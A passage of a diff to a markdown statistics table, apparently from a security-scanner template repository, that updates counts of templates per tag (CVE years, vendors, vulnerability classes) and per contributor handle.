disclosure | 45 | meme-lord | 10 | | | | | | | -| cve2016 | 45 | hackergautam | 10 | | | | | | | +| router | 52 | cyllective | 11 | | | | | | | +| oracle | 50 | nadino | 10 | | | | | | | +| disclosure | 45 | alph4byt3 | 10 | | | | | | | +| cve2016 | 45 | meme-lord | 10 | | | | | | | | plugin | 40 | johnk3r | 10 | | | | | | | +| auth-bypass | 39 | hackergautam | 10 | | | | | | | | cve2014 | 37 | random_robbie | 10 | | | | | | | -| auth-bypass | 37 | alph4byt3 | 10 | | | | | | | -| google | 36 | emadshanab | 9 | | | | | | | -| cve2015 | 36 | dogasantos | 9 | | | | | | | -| cisco | 35 | aashiq | 8 | | | | | | | +| google | 36 | edoardottt | 9 | | | | | | | +| cve2015 | 36 | emadshanab | 9 | | | | | | | +| cisco | 35 | dogasantos | 9 | | | | | | | | authenticated | 35 | zh | 8 | | | | | | | -| logs | 33 | iamthefrogy | 8 | | | | | | | -| atlassian | 32 | edoardottt | 8 | | | | | | | -| injection | 30 | that_juan_ | 8 | | | | | | | -| listing | 30 | logicalhunter | 7 | | | | | | | +| logs | 33 | that_juan_ | 8 | | | | | | | +| atlassian | 32 | iamthefrogy | 8 | | | | | | | +| injection | 30 | aashiq | 8 | | | | | | | +| listing | 30 | harshbothra_ | 7 | | | | | | | | jira | 30 | techryptic (@tech) | 7 | | | | | | | -| traversal | 29 | kophjager007 | 7 | | | | | | | -| devops | 28 | oppsec | 7 | | | | | | | -| generic | 25 | random-robbie | 7 | | | | | | | -| kubernetes | 25 | randomstr1ng | 7 | | | | | | | -| adobe | 24 | harshbothra_ | 7 | | | | | | | -| cms | 24 | divya_mudgal | 7 | | | | | | | -| oss | 24 | 0x240x23elu | 7 | | | | | | | +| traversal | 29 | logicalhunter | 7 | | | | | | | +| devops | 28 | 0x240x23elu | 7 | | | | | | | +| generic | 26 | kophjager007 | 7 | | | | | | | +| kubernetes | 25 | divya_mudgal | 7 | | | | | | | +| adobe | 24 | randomstr1ng | 7 | | | | | | | | springboot | 24 | dr_set | 7 | | | | | | | -| proxy | 22 | iamnoooob | 6 | | | | | | | -| cnvd | 22 | caspergn | 6 | | | | | | | -| sap | 22 | puzzlepeaches | 6 | | | | | | | -| aem | 21 | 
rootxharsh | 6 | | | | | | | -| microsoft | 21 | evan rubinstein | 6 | | | | | | | -| misc | 21 | pathtaga | 6 | | | | | | | +| cms | 24 | random-robbie | 7 | | | | | | | +| oss | 24 | oppsec | 7 | | | | | | | +| proxy | 22 | pathtaga | 6 | | | | | | | +| cnvd | 22 | leovalcante | 6 | | | | | | | +| sap | 22 | iamnoooob | 6 | | | | | | | +| microsoft | 21 | rootxharsh | 6 | | | | | | | +| vmware | 21 | caspergn | 6 | | | | | | | | intrusive | 21 | __fazal | 6 | | | | | | | -| vmware | 21 | leovalcante | 6 | | | | | | | -| debug | 21 | forgedhallpass | 6 | | | | | | | -| service | 20 | pentest_swissky | 6 | | | | | | | +| debug | 21 | pentest_swissky | 6 | | | | | | | +| aem | 21 | forgedhallpass | 6 | | | | | | | +| misc | 21 | puzzlepeaches | 6 | | | | | | | +| wp-theme | 20 | evan rubinstein | 6 | | | | | | | +| service | 20 | ganofins | 5 | | | | | | | | fuzz | 20 | _0xf4n9x_ | 5 | | | | | | | -| cve2012 | 19 | elsfa7110 | 5 | | | | | | | -| wp-theme | 19 | xelkomy | 5 | | | | | | | -| manageengine | 19 | joanbono | 5 | | | | | | | -| php | 18 | panch0r3d | 5 | | | | | | | -| dns | 18 | ganofins | 5 | | | | | | | -| zoho | 18 | lu4nx | 5 | | | | | | | -| deserialization | 17 | yanyun | 5 | | | | | | | -| tomcat | 17 | podalirius | 5 | | | | | | | -| weblogic | 17 | praetorian-thendrickson | 5 | | | | | | | -| aws | 17 | imnightmaree | 5 | | | | | | | -| k8s | 16 | tanq16 | 4 | | | | | | | -| ibm | 16 | incogbyte | 4 | | | | | | | -| cve2011 | 15 | tess | 4 | | | | | | | -| jenkins | 15 | defr0ggy | 4 | | | | | | | -| gitlab | 15 | dolev farhi | 4 | | | | | | | -| dlink | 15 | e_schultze_ | 4 | | | | | | | -| struts | 15 | dadevel | 4 | | | | | | | -| hp | 14 | nodauf | 4 | | | | | | | -| api | 14 | wisnupramoedya | 4 | | | | | | | -| android | 14 | me9187 | 3 | | | | | | | -| xxe | 14 | shine | 3 | | | | | | | -| java | 14 | f1tz | 3 | | | | | | | -| fileupload | 14 | alifathi-h1 | 3 | | | | | | | -| cve2009 | 14 | fyoorer | 3 | | | | | | | -| camera | 13 | 
andydoering | 3 | | | | | | | -| ruijie | 13 | _generic_human_ | 3 | | | | | | | -| log4j | 12 | h1ei1 | 3 | | | | | | | +| manageengine | 19 | xelkomy | 5 | | | | | | | +| cve2012 | 19 | panch0r3d | 5 | | | | | | | +| zoho | 18 | elsfa7110 | 5 | | | | | | | +| php | 18 | imnightmaree | 5 | | | | | | | +| dns | 18 | praetorian-thendrickson | 5 | | | | | | | +| aws | 17 | yanyun | 5 | | | | | | | +| tomcat | 17 | joanbono | 5 | | | | | | | +| weblogic | 17 | lu4nx | 5 | | | | | | | +| deserialization | 17 | podalirius | 5 | | | | | | | +| k8s | 16 | defr0ggy | 4 | | | | | | | +| ibm | 16 | nodauf | 4 | | | | | | | +| struts | 16 | incogbyte | 4 | | | | | | | +| gitlab | 15 | dadevel | 4 | | | | | | | +| jenkins | 15 | tess | 4 | | | | | | | +| dlink | 15 | wisnupramoedya | 4 | | | | | | | +| cve2011 | 15 | dolev farhi | 4 | | | | | | | +| fileupload | 14 | tanq16 | 4 | | | | | | | +| xxe | 14 | e_schultze_ | 4 | | | | | | | +| cve2009 | 14 | h1ei1 | 4 | | | | | | | +| hp | 14 | me9187 | 3 | | | | | | | +| android | 14 | andydoering | 3 | | | | | | | +| java | 14 | shifacyclewala | 3 | | | | | | | +| api | 14 | sushantkamble | 3 | | | | | | | +| ruijie | 13 | f1tz | 3 | | | | | | | +| firewall | 13 | r3naissance | 3 | | | | | | | +| camera | 13 | jarijaas | 3 | | | | | | | +| cve2013 | 12 | emenalf | 3 | | | | | | | +| lfr | 12 | binaryfigments | 3 | | | | | | | | netsweeper | 12 | z3bd | 3 | | | | | | | -| printer | 12 | github.com/its0x08 | 3 | | | | | | | -| lfr | 12 | lark-lab | 3 | | | | | | | -| cve2013 | 12 | unstabl3 | 3 | | | | | | | -| status | 12 | mavericknerd | 3 | | | | | | | -| rails | 12 | yuzhe-zhang-0 | 3 | | | | | | | -| cnvd2021 | 11 | binaryfigments | 3 | | | | | | | -| nginx | 11 | gitlab red team | 3 | | | | | | | -| firewall | 11 | skeltavik | 3 | | | | | | | -| upload | 11 | jarijaas | 3 | | | | | | | -| magento | 11 | arcc | 3 | | | | | | | -| graphql | 11 | johnjhacking | 3 | | | | | | | -| netgear | 11 | impramodsargar | 3 | | | | | | | -| 
spring | 10 | r3naissance | 3 | | | | | | | -| fortigate | 10 | dudez | 3 | | | | | | | -| grafana | 10 | davidmckennirey | 3 | | | | | | | -| coldfusion | 10 | supras | 3 | | | | | | | -| dell | 10 | emenalf | 3 | | | | | | | -| jolokia | 10 | whoever | 3 | | | | | | | -| auth | 10 | shifacyclewala | 3 | | | | | | | -| glpi | 10 | yash anand @yashanand155 | 3 | | | | | | | -| backup | 10 | mr-xn | 3 | | | | | | | -| airflow | 10 | sushantkamble | 3 | | | | | | | -| woocommerce | 9 | 0w4ys | 3 | | | | | | | -| fastjson | 9 | thomas_from_offensity | 3 | | | | | | | -| mirai | 9 | cocxanh | 2 | | | | | | | -| ftp | 9 | x1m_martijn | 2 | | | | | | | -| windows | 9 | ambassify | 2 | | | | | | | -| fortinet | 9 | its0x08 | 2 | | | | | | | -| webserver | 9 | parth | 2 | | | | | | | -| zabbix | 9 | danielmofer | 2 | | | | | | | -| drupal | 9 | lotusdll | 2 | | | | | | | -| cve2008 | 9 | bsysop | 2 | | | | | | | -| jndi | 9 | nuk3s3c | 2 | | | | | | | -| github | 9 | huowuzhao | 2 | | | | | | | -| laravel | 9 | kiblyn11 | 2 | | | | | | | -| metadata | 8 | 0xcrypto | 2 | | | | | | | -| amazon | 8 | swissky | 2 | | | | | | | +| rails | 12 | whoever | 3 | | | | | | | +| log4j | 12 | impramodsargar | 3 | | | | | | | +| nginx | 12 | johnjhacking | 3 | | | | | | | +| printer | 12 | _generic_human_ | 3 | | | | | | | +| status | 12 | unstabl3 | 3 | | | | | | | +| upload | 11 | yash anand @yashanand155 | 3 | | | | | | | +| netgear | 11 | supras | 3 | | | | | | | +| graphql | 11 | github.com/its0x08 | 3 | | | | | | | +| cnvd2021 | 11 | mr-xn | 3 | | | | | | | +| magento | 11 | fyoorer | 3 | | | | | | | +| glpi | 10 | thomas_from_offensity | 3 | | | | | | | +| grafana | 10 | 0w4ys | 3 | | | | | | | +| spring | 10 | davidmckennirey | 3 | | | | | | | +| jolokia | 10 | dudez | 3 | | | | | | | +| backup | 10 | gitlab red team | 3 | | | | | | | +| auth | 10 | arcc | 3 | | | | | | | +| dell | 10 | shine | 3 | | | | | | | +| fortigate | 10 | veshraj | 3 | | | | | | | +| airflow | 10 | 
skeltavik | 3 | | | | | | | +| coldfusion | 10 | mavericknerd | 3 | | | | | | | +| github | 9 | alifathi-h1 | 3 | | | | | | | +| jndi | 9 | lark-lab | 3 | | | | | | | +| mirai | 9 | yuzhe-zhang-0 | 3 | | | | | | | +| wso2 | 9 | cocxanh | 2 | | | | | | | +| fastjson | 9 | bananabr | 2 | | | | | | | +| iis | 9 | paperpen | 2 | | | | | | | +| cve2008 | 9 | its0x08 | 2 | | | | | | | +| laravel | 9 | ajaysenr | 2 | | | | | | | +| woocommerce | 9 | smaranchand | 2 | | | | | | | +| fortinet | 9 | dahse89 | 2 | | | | | | | +| zabbix | 9 | 0xcrypto | 2 | | | | | | | +| ftp | 9 | mohammedsaneem | 2 | | | | | | | +| drupal | 9 | 0xsapra | 2 | | | | | | | +| webserver | 9 | pxmme1337 | 2 | | | | | | | +| windows | 9 | nkxxkn | 2 | | | | | | | +| phpmyadmin | 8 | gal nagli | 2 | | | | | | | +| metadata | 8 | nuk3s3c | 2 | | | | | | | | audit | 8 | z0ne | 2 | | | | | | | -| prometheus | 8 | bananabr | 2 | | | | | | | +| bypass | 8 | convisoappsec | 2 | | | | | | | +| django | 8 | x1m_martijn | 2 | | | | | | | | solr | 8 | r12w4n | 2 | | | | | | | -| phpmyadmin | 8 | mohammedsaneem | 2 | | | | | | | -| azure | 8 | redteambrasil | 2 | | | | | | | -| django | 8 | cckuakilong | 2 | | | | | | | -| scada | 8 | gevakun | 2 | | | | | | | -| blind | 8 | martincodes-de | 2 | | | | | | | -| iis | 8 | bing0o | 2 | | | | | | | -| confluence | 8 | paperpen | 2 | | | | | | | -| bypass | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| citrix | 8 | 0xsapra | 2 | | | | | | | -| vcenter | 8 | gal nagli | 2 | | | | | | | -| wso2 | 8 | rafaelwdornelas | 2 | | | | | | | -| rconfig | 7 | afaq | 2 | | | | | | | -| files | 7 | amsda | 2 | | | | | | | -| sonicwall | 7 | hassan khan yusufzai - | 2 | | | | | | | +| azure | 8 | swissky | 2 | | | | | | | +| zyxel | 8 | udit_thakkur | 2 | | | | | | | +| amazon | 8 | kre80r | 2 | | | | | | | +| confluence | 8 | lotusdll | 2 | | | | | | | +| prometheus | 8 | thardt-praetorian | 2 | | | | | | | +| scada | 8 | splint3r7 | 2 | | | | | | | +| citrix | 8 | 
ree4pwn | 2 | | | | | | | +| vcenter | 8 | ambassify | 2 | | | | | | | +| blind | 8 | randomrobbie | 2 | | | | | | | +| exchange | 7 | zomsop82 | 2 | | | | | | | +| python | 7 | geekby | 2 | | | | | | | +| kube | 7 | dheerajmadhukar | 2 | | | | | | | +| bucket | 7 | bernardofsr | 2 | | | | | | | +| rconfig | 7 | koti2 | 2 | | | | | | | +| firebase | 7 | 0xrudra | 2 | | | | | | | +| mail | 7 | bsysop | 2 | | | | | | | +| vpn | 7 | hassan khan yusufzai - | 2 | | | | | | | | | | splint3r7 | | | | | | | | -| mail | 7 | pxmme1337 | 2 | | | | | | | -| python | 7 | dahse89 | 2 | | | | | | | -| elasticsearch | 7 | zomsop82 | 2 | | | | | | | -| exchange | 7 | 0xelkomy | 2 | | | | | | | -| vpn | 7 | hackerarpan | 2 | | | | | | | -| ssti | 7 | hetroublemakr | 2 | | | | | | | -| squirrelmail | 7 | nvn1729 | 2 | | | | | | | -| firebase | 7 | udit_thakkur | 2 | | | | | | | -| maps | 7 | geekby | 2 | | | | | | | -| bucket | 7 | ajaysenr | 2 | | | | | | | -| kafka | 7 | y4er | 2 | | | | | | | -| kube | 7 | foulenzer | 2 | | | | | | | -| crlf | 6 | convisoappsec | 2 | | | | | | | -| cicd | 6 | vsh00t | 2 | | | | | | | -| zimbra | 6 | ehsahil | 2 | | | | | | | -| sitecore | 6 | 0xprial | 2 | | | | | | | -| cobbler | 6 | kre80r | 2 | | | | | | | -| lucee | 6 | vavkamil | 2 | | | | | | | -| huawei | 6 | w4cky_ | 2 | | | | | | | -| headless | 6 | moritz nentwig | 2 | | | | | | | -| cnvd2020 | 6 | thardt-praetorian | 2 | | | | | | | -| go | 6 | taielab | 2 | | | | | | | -| fpd | 6 | nkxxkn | 2 | | | | | | | -| druid | 6 | 0xrudra | 2 | | | | | | | -| nodejs | 6 | k11h-de | 2 | | | | | | | -| magmi | 6 | randomrobbie | 2 | | | | | | | -| slack | 6 | smaranchand | 2 | | | | | | | -| jboss | 6 | joeldeleep | 2 | | | | | | | -| jetty | 6 | bp0lr | 2 | | | | | | | -| enum | 6 | sy3omda | 2 | | | | | | | -| bigip | 6 | hahwul | 2 | | | | | | | -| backdoor | 6 | raesene | 2 | | | | | | | -| docker | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| ofbiz | 6 | socketz | 2 | | | | | | | -| 
firmware | 6 | 0xsmiley | 2 | | | | | | | -| minio | 5 | koti2 | 2 | | | | | | | -| solarwinds | 5 | dheerajmadhukar | 2 | | | | | | | -| rfi | 5 | splint3r7 | 2 | | | | | | | -| rseenet | 5 | fabaff | 2 | | | | | | | -| fatpipe | 5 | luci | 2 | | | | | | | -| ssl | 5 | ree4pwn | 2 | | | | | | | -| symantec | 5 | sbani | 2 | | | | | | | -| setup | 5 | paradessia | 2 | | | | | | | -| leak | 5 | g4l1t0 | 2 | | | | | | | -| kubelet | 5 | bernardofsr | 2 | | | | | | | -| gocd | 5 | manas_harsh | 2 | | | | | | | -| cache | 5 | rschio | 1 | | | | | | | -| git | 5 | b0rn2r00t | 1 | | | | | | | -| node | 5 | blckraven | 1 | | | | | | | -| alibaba | 5 | borna nematzadeh | 1 | | | | | | | -| error | 5 | phyr3wall | 1 | | | | | | | -| symfony | 5 | tim_koopmans | 1 | | | | | | | -| samsung | 5 | retr02332 | 1 | | | | | | | -| keycloak | 5 | whynotke | 1 | | | | | | | -| circarlife | 5 | jiheon-dev | 1 | | | | | | | -| strapi | 5 | revblock | 1 | | | | | | | -| dedecms | 5 | dievus | 1 | | | | | | | -| thinkphp | 5 | bibeksapkota (sar00n) | 1 | | | | | | | -| microweber | 5 | bartu utku sarp | 1 | | | | | | | -| ruby | 5 | brabbit10 | 1 | | | | | | | -| apisix | 5 | akshansh | 1 | | | | | | | -| ecology | 5 | xstp | 1 | | | | | | | -| storage | 5 | kurohost | 1 | | | | | | | -| opensis | 5 | juicypotato1 | 1 | | | | | | | -| moodle | 5 | tirtha_mandal | 1 | | | | | | | -| icewarp | 5 | chron0x | 1 | | | | | | | -| metinfo | 5 | 0xceba | 1 | | | | | | | -| zhiyuan | 5 | bughuntersurya | 1 | | | | | | | -| artica | 5 | patralos | 1 | | | | | | | -| puppet | 4 | 3th1c_yuk1 | 1 | | | | | | | -| jellyfin | 4 | compr00t | 1 | | | | | | | -| awstats | 4 | luqman | 1 | | | | | | | -| npm | 4 | intx0x80 | 1 | | | | | | | -| microstrategy | 4 | 2rs3c | 1 | | | | | | | -| activemq | 4 | kareemse1im | 1 | | | | | | | -| sonarqube | 4 | wabafet | 1 | | | | | | | -| flink | 4 | zandros0 | 1 | | | | | | | -| plesk | 4 | mrcl0wnlab | 1 | | | | | | | -| gogs | 4 | furkansayim | 1 | | | | | | | 
-| elastic | 4 | opencirt | 1 | | | | | | | -| cve2007 | 4 | daffianfo | 1 | | | | | | | -| search | 4 | alevsk | 1 | | | | | | | -| hpe | 4 | sec_hawk | 1 | | | | | | | -| cloud | 4 | francescocarlucci | 1 | | | | | | | -| couchdb | 4 | 0xteles | 1 | | | | | | | -| springcloud | 4 | flag007 | 1 | | | | | | | -| kibana | 4 | berkdusunur | 1 | | | | | | | -| ssh | 4 | th3.d1p4k | 1 | | | | | | | -| smtp | 4 | 0xtavian | 1 | | | | | | | -| resin | 4 | aaronchen0 | 1 | | | | | | | -| stripe | 4 | evolutionsec | 1 | | | | | | | -| hongdian | 4 | hexcat | 1 | | | | | | | -| voip | 4 | jbaines-r7 | 1 | | | | | | | -| adminer | 4 | veshraj | 1 | | | | | | | -| artifactory | 4 | anon-artist | 1 | | | | | | | -| cockpit | 4 | kailashbohara | 1 | | | | | | | -| asp | 4 | f1she3 | 1 | | | | | | | -| prestashop | 4 | nielsing | 1 | | | | | | | -| caucho | 4 | zsusac | 1 | | | | | | | -| nexus | 4 | sicksec | 1 | | | | | | | -| photo | 4 | elouhi | 1 | | | | | | | -| cnvd2019 | 4 | hanlaomo | 1 | | | | | | | -| paypal | 4 | evan rubinstien | 1 | | | | | | | -| hikvision | 4 | nerrorsec | 1 | | | | | | | -| kevinlab | 4 | 0xh7ml | 1 | | | | | | | -| oa | 4 | higor melgaço (eremit4) | 1 | | | | | | | -| hoteldruid | 4 | igibanez | 1 | | | | | | | -| mongodb | 4 | duty_1g | 1 | | | | | | | -| ognl | 4 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | | | | | | | | -| websphere | 4 | rubina119 | 1 | | | | | | | -| db | 4 | majidmc2 | 1 | | | | | | | -| xmlrpc | 4 | yuansec | 1 | | | | | | | -| buffalo | 4 | elder tao | 1 | | | | | | | -| beyondtrust | 4 | jeya.seelan | 1 | | | | | | | -| tikiwiki | 4 | exid | 1 | | | | | | | -| panos | 4 | ofjaaah | 1 | | | | | | | -| mailchimp | 4 | jrolf | 1 | | | | | | | -| zyxel | 4 | pudsec | 1 | | | | | | | -| wcs | 4 | un-fmunozs | 1 | | | | | | | -| thinkcmf | 4 | makyotox | 1 | | | | | | | -| jetbrains | 4 | d0rkerdevil | 1 | | | | | | | -| terramaster | 4 | mesaglio | 1 | | | | | | | -| aspose | 4 | _c0wb0y_ | 1 | | | | | | | 
-| cacti | 4 | manasmbellani | 1 | | | | | | | -| database | 3 | momen eldawakhly | 1 | | | | | | | -| movable | 3 | aceseven (digisec360) | 1 | | | | | | | -| sendgrid | 3 | arall | 1 | | | | | | | -| mongo | 3 | amnotacat | 1 | | | | | | | -| javascript | 3 | kba@sogeti_esec | 1 | | | | | | | -| jfrog | 3 | daviey | 1 | | | | | | | -| dreambox | 3 | kaizensecurity | 1 | | | | | | | -| kentico | 3 | push4d | 1 | | | | | | | -| jeesns | 3 | adrianmf | 1 | | | | | | | -| httpd | 3 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| thinfinity | 3 | apt-mirror | 1 | | | | | | | -| log | 3 | sherlocksecurity | 1 | | | | | | | -| cisa | 3 | petruknisme | 1 | | | | | | | -| nosqli | 3 | dhiyaneshdki | 1 | | | | | | | -| fanruan | 3 | 0xceeb | 1 | | | | | | | -| sugarcrm | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| netlify | 3 | sickwell | 1 | | | | | | | -| jamf | 3 | x6263 | 1 | | | | | | | -| linkerd | 3 | prettyboyaaditya | 1 | | | | | | | -| trendnet | 3 | droberson | 1 | | | | | | | -| epson | 3 | v0idc0de | 1 | | | | | | | -| openssh | 3 | philippdelteil | 1 | | | | | | | -| phppgadmin | 3 | ok_bye_now | 1 | | | | | | | -| actuator | 3 | knassar702 | 1 | | | | | | | -| ampps | 3 | alperenkesk | 1 | | | | | | | -| redis | 3 | florianmaak | 1 | | | | | | | -| hashicorp | 3 | coldfish | 1 | | | | | | | -| square | 3 | osamahamad | 1 | | | | | | | -| axis2 | 3 | omarkurt | 1 | | | | | | | -| 3cx | 3 | fopina | 1 | | | | | | | -| heroku | 3 | ggranjus | 1 | | | | | | | -| vbulletin | 3 | wlayzz | 1 | | | | | | | -| oauth | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| nuuo | 3 | narluin | 1 | | | | | | | -| vrealize | 3 | infosecsanyam | 1 | | | | | | | -| centos | 3 | exceed | 1 | | | | | | | -| prtg | 3 | thebinitghimire | 1 | | | | | | | -| sharepoint | 3 | orpheus | 1 | | | | | | | -| fuelcms | 3 | schniggie | 1 | | | | | | | -| subrion | 3 | skylark-lab | 1 | | | | | | | -| synology | 3 | 
p-l- | 1 | | | | | | | -| mcafee | 3 | gboddin | 1 | | | | | | | -| empirecms | 3 | streetofhackerr007 | 1 | | | | | | | -| voipmonitor | 3 | brenocss | 1 | | | | | | | -| nacos | 3 | notsoevilweasel | 1 | | | | | | | -| dos | 3 | b4uh0lz | 1 | | | | | | | -| seeyon | 3 | mhdsamx | 1 | | | | | | | -| elfinder | 3 | rodnt | 1 | | | | | | | -| bitrix | 3 | udyz | 1 | | | | | | | -| ems | 3 | bad5ect0r | 1 | | | | | | | -| kingsoft | 3 | ipanda | 1 | | | | | | | -| splunk | 3 | s1r1u5_ | 1 | | | | | | | -| panabit | 3 | thevillagehacker | 1 | | | | | | | -| axis | 3 | ooooooo_q | 1 | | | | | | | -| dolibarr | 3 | cookiehanhoan | 1 | | | | | | | -| selea | 3 | fq_hsu | 1 | | | | | | | -| geowebserver | 3 | jeya seelan | 1 | | | | | | | -| fortios | 3 | j3ssie/geraldino2 | 1 | | | | | | | -| pentaho | 3 | lark lab | 1 | | | | | | | -| linkedin | 3 | c3l3si4n | 1 | | | | | | | -| bruteforce | 3 | _harleo | 1 | | | | | | | -| sql | 3 | oscarintherocks | 1 | | | | | | | -| axigen | 3 | micha3lb3n | 1 | | | | | | | -| aptus | 3 | streetofhackerr007 (rohit | 1 | | | | | | | +| maps | 7 | vsh00t | 2 | | | | | | | +| elasticsearch | 7 | luci | 2 | | | | | | | +| ssti | 7 | paradessia | 2 | | | | | | | +| sonicwall | 7 | 0xsmiley | 2 | | | | | | | +| files | 7 | k11h-de | 2 | | | | | | | +| squirrelmail | 7 | kiblyn11 | 2 | | | | | | | +| kafka | 7 | moritz nentwig | 2 | | | | | | | +| cicd | 6 | afaq | 2 | | | | | | | +| cnvd2020 | 6 | cckuakilong | 2 | | | | | | | +| jetty | 6 | sy3omda | 2 | | | | | | | +| go | 6 | danielmofer | 2 | | | | | | | +| cobbler | 6 | sbani | 2 | | | | | | | +| zimbra | 6 | g4l1t0 | 2 | | | | | | | +| docker | 6 | hetroublemakr | 2 | | | | | | | +| jboss | 6 | gevakun | 2 | | | | | | | +| huawei | 6 | joeldeleep | 2 | | | | | | | +| enum | 6 | martincodes-de | 2 | | | | | | | +| ecology | 6 | socketz | 2 | | | | | | | +| druid | 6 | amsda | 2 | | | | | | | +| dedecms | 6 | 0xprial | 2 | | | | | | | +| ofbiz | 6 | vavkamil | 2 | | | | | | | +| bigip 
| 6 | y4er | 2 | | | | | | | +| nodejs | 6 | raesene | 2 | | | | | | | +| sitecore | 6 | parth | 2 | | | | | | | +| backdoor | 6 | 0xelkomy | 2 | | | | | | | +| fpd | 6 | w4cky_ | 2 | | | | | | | +| crlf | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| slack | 6 | ehsahil | 2 | | | | | | | +| lucee | 6 | redteambrasil | 2 | | | | | | | +| magmi | 6 | huowuzhao | 2 | | | | | | | +| firmware | 6 | bing0o | 2 | | | | | | | +| headless | 6 | fabaff | 2 | | | | | | | +| samsung | 5 | taielab | 2 | | | | | | | +| artica | 5 | foulenzer | 2 | | | | | | | +| opensis | 5 | hackerarpan | 2 | | | | | | | +| fatpipe | 5 | manas_harsh | 2 | | | | | | | +| thinkphp | 5 | bp0lr | 2 | | | | | | | +| gocd | 5 | hahwul | 2 | | | | | | | +| minio | 5 | nvn1729 | 2 | | | | | | | +| microweber | 5 | rafaelwdornelas | 2 | | | | | | | +| node | 5 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| symantec | 5 | zinminphy0 | 1 | | | | | | | +| ssl | 5 | d0rkerdevil | 1 | | | | | | | +| solarwinds | 5 | jeya.seelan | 1 | | | | | | | +| rfi | 5 | ldionmarcil | 1 | | | | | | | +| zhiyuan | 5 | x6263 | 1 | | | | | | | +| alibaba | 5 | kaizensecurity | 1 | | | | | | | +| git | 5 | 0ri2n | 1 | | | | | | | +| rseenet | 5 | sherlocksecurity | 1 | | | | | | | +| symfony | 5 | toufik-airane | 1 | | | | | | | +| keycloak | 5 | kiks7 | 1 | | | | | | | +| circarlife | 5 | revblock | 1 | | | | | | | +| strapi | 5 | qlkwej | 1 | | | | | | | +| storage | 5 | zhenwarx | 1 | | | | | | | +| error | 5 | dawid-czarnecki | 1 | | | | | | | +| leak | 5 | luqman | 1 | | | | | | | +| apisix | 5 | flag007 | 1 | | | | | | | +| ruby | 5 | anon-artist | 1 | | | | | | | +| icewarp | 5 | pratik khalane | 1 | | | | | | | +| kubelet | 5 | 0xrod | 1 | | | | | | | +| metinfo | 5 | rubina119 | 1 | | | | | | | +| moodle | 5 | clarkvoss | 1 | | | | | | | +| cache | 5 | makyotox | 1 | | | | | | | +| setup | 5 | borna nematzadeh | 1 | | | | | | | +| panos | 4 | berkdusunur | 1 | | | | | | | +| resin | 4 | soyelmago | 1 | | 
| | | | | +| oa | 4 | 0xtavian | 1 | | | | | | | +| adminer | 4 | alex | 1 | | | | | | | +| springcloud | 4 | _c0wb0y_ | 1 | | | | | | | +| hongdian | 4 | p-l- | 1 | | | | | | | +| sophos | 4 | kailashbohara | 1 | | | | | | | +| hoteldruid | 4 | orpheus | 1 | | | | | | | +| mongodb | 4 | yavolo | 1 | | | | | | | +| voip | 4 | bad5ect0r | 1 | | | | | | | +| awstats | 4 | bughuntersurya | 1 | | | | | | | +| thinkcmf | 4 | s1r1u5_ | 1 | | | | | | | +| websphere | 4 | florianmaak | 1 | | | | | | | +| db | 4 | yashanand155 | 1 | | | | | | | +| ognl | 4 | wabafet | 1 | | | | | | | +| artifactory | 4 | andirrahmani1 | 1 | | | | | | | +| kibana | 4 | thevillagehacker | 1 | | | | | | | +| prestashop | 4 | ilovebinbash | 1 | | | | | | | +| mailchimp | 4 | fmunozs | 1 | | | | | | | +| jellyfin | 4 | akash.c | 1 | | | | | | | +| flink | 4 | phyr3wall | 1 | | | | | | | +| jetbrains | 4 | ooooooo_q | 1 | | | | | | | +| elastic | 4 | 0xd0ff9 | 1 | | | | | | | +| buffalo | 4 | kba@sogeti_esec | 1 | | | | | | | +| terramaster | 4 | skylark-lab | 1 | | | | | | | +| beyondtrust | 4 | prajiteshsingh | 1 | | | | | | | +| couchdb | 4 | ahmetpergamum | 1 | | | | | | | +| wcs | 4 | sicksec | 1 | | | | | | | +| puppet | 4 | bibeksapkota (sar00n) | 1 | | | | | | | +| search | 4 | furkansayim | 1 | | | | | | | +| cloud | 4 | nerrorsec | 1 | | | | | | | +| microstrategy | 4 | b0rn2r00t | 1 | | | | | | | +| npm | 4 | elder tao | 1 | | | | | | | +| caucho | 4 | ph33r | 1 | | | | | | | +| cacti | 4 | ok_bye_now | 1 | | | | | | | +| activemq | 4 | manasmbellani | 1 | | | | | | | +| paypal | 4 | udyz | 1 | | | | | | | +| smtp | 4 | retr0 | 1 | | | | | | | +| photo | 4 | majidmc2 | 1 | | | | | | | +| cve2007 | 4 | philippdelteil | 1 | | | | | | | +| plesk | 4 | akshansh | 1 | | | | | | | +| asp | 4 | lethargynavigator | 1 | | | | | | | +| tikiwiki | 4 | husain | 1 | | | | | | | +| kevinlab | 4 | amnotacat | 1 | | | | | | | +| ssh | 4 | remonsec | 1 | | | | | | | +| gogs | 4 | mesaglio | 1 | | | | | 
| | +| hikvision | 4 | absshax | 1 | | | | | | | +| aspose | 4 | retr02332 | 1 | | | | | | | +| cockpit | 4 | furkansenan | 1 | | | | | | | +| sonarqube | 4 | izn0u | 1 | | | | | | | +| nexus | 4 | omarkurt | 1 | | | | | | | +| hpe | 4 | apt-mirror | 1 | | | | | | | +| stripe | 4 | remi gascou (podalirius) | 1 | | | | | | | +| cnvd2019 | 4 | compr00t | 1 | | | | | | | +| xmlrpc | 4 | 3th1c_yuk1 | 1 | | | | | | | +| umbraco | 3 | th3.d1p4k | 1 | | | | | | | +| phpinfo | 3 | push4d | 1 | | | | | | | +| sharepoint | 3 | 0xceeb | 1 | | | | | | | +| openemr | 3 | streetofhackerr007 (rohit | 1 | | | | | | | | | | soni) | | | | | | | | -| webadmin | 3 | j33n1k4 | 1 | | | | | | | -| globalprotect | 3 | miroslavsotak | 1 | | | | | | | -| httpbin | 3 | zhenwarx | 1 | | | | | | | -| consul | 3 | justmumu | 1 | | | | | | | -| ebs | 3 | exploitation | 1 | | | | | | | -| phpinfo | 3 | co0nan | 1 | | | | | | | -| samba | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | -| facebook | 3 | manuelbua | 1 | | | | | | | -| openam | 3 | ilovebinbash | 1 | | | | | | | -| telerik | 3 | bernardo rodrigues | 1 | | | | | | | +| centos | 3 | ohlinge | 1 | | | | | | | +| zeroshell | 3 | tirtha | 1 | | | | | | | +| ampps | 3 | iampritam | 